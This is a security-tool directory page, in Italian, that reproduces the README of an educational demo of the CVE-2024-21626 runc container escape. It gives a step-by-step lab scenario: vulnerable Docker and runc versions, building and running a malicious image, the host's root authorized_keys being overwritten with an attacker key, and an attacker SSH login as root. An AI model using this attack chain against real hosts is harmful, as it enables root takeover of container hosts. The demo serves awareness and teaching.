Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-21626-demo — Dimostrazione dell'exploit di container escape CVE-2024-21626 che consente l'accesso root all'host tramite un'immagine Docker dannosa, con scenario di attacco passo-passo a scopo educativo. | Kitploit
Strumenti/GitHubGitHub/laysakura/cve-2024-21626-demo
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitApprendimento e FormazioneEscape dal ContainerLab e Pratica
GitHublaysakura/cve-2024-21626-demo

CVE-2024-21626-demo

Dimostrazione dell'exploit di container escape CVE-2024-21626 che consente l'accesso root all'host tramite un'immagine Docker dannosa, con scenario di attacco passo-passo a scopo educativo.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
3132 anni faNon ancora revisionato

CVE-2024-21626-demo

Demo per il LT del Container Runtime Meetup #5.

Scopo: diffondere la consapevolezza del pericolo di attacco secondo le informazioni pubbliche; l'abuso è severamente vietato.

Slides

Container Runtime Meetup #5 〜Quella immagine, ti fidi davvero?〜 Ottenere la root dell'host con CVE-2024-21626

Login su victim-server

Macchina registrata come victim-server nella ssh_config del laptop per la demo.

ssh victim-server

Informazioni sulla versione come prerequisito per essere vittima dell'attacco:

ubuntu@victim-server:$ docker --version
Docker version 20.10.25+dfsg1, build b82b9f3

ubuntu@victim-server:$ runc --version
runc version 1.1.10+ds1
commit: 1.1.10+ds1-1
spec: 1.1.0
go: go1.21.3
libseccomp: 2.5.4

Login su attacker-server

Analogamente

ssh attacker-server

Scenario

1. [victim-server] Recupero, build ed esecuzione accidentali di un'immagine Docker maliziosa

ubuntu@victim-server:~$ git clone [email protected]:laysakura/CVE-2024-21626-demo.git
ubuntu@victim-server:~$ cd CVE-2024-21626-demo/
ubuntu@victim-server:~/CVE-2024-21626-demo$ docker build -t myimage .
ubuntu@victim-server:~/CVE-2024-21626-demo$ docker run -it myimage

2. [victim-server] /root/.ssh/authorized_keys viene sovrascritto con la chiave pubblica dell'attaccante, senza che ce ne si accorga

Qui non si fa nulla perché non è intenzionale, ma si mostrano i comandi per verificare la situazione.

ubuntu@victim-server:~$ sudo cat /root/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKPHHGSytV6bL1ryaEKE9XNWN23piXdzsI3Rzxe20IF6 ubuntu@attacker-server

3. [attacker-server] Login come root su victim-server

attacker@attacker-server:~$ ssh -i .ssh/id_ed25519 root@victim-server

root@victim-server:~# id
uid=0(root) gid=0(root) groups=0(root)

References

  • https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv
  • https://github.com/NitroCao/CVE-2024-21626
Scarica lo strumento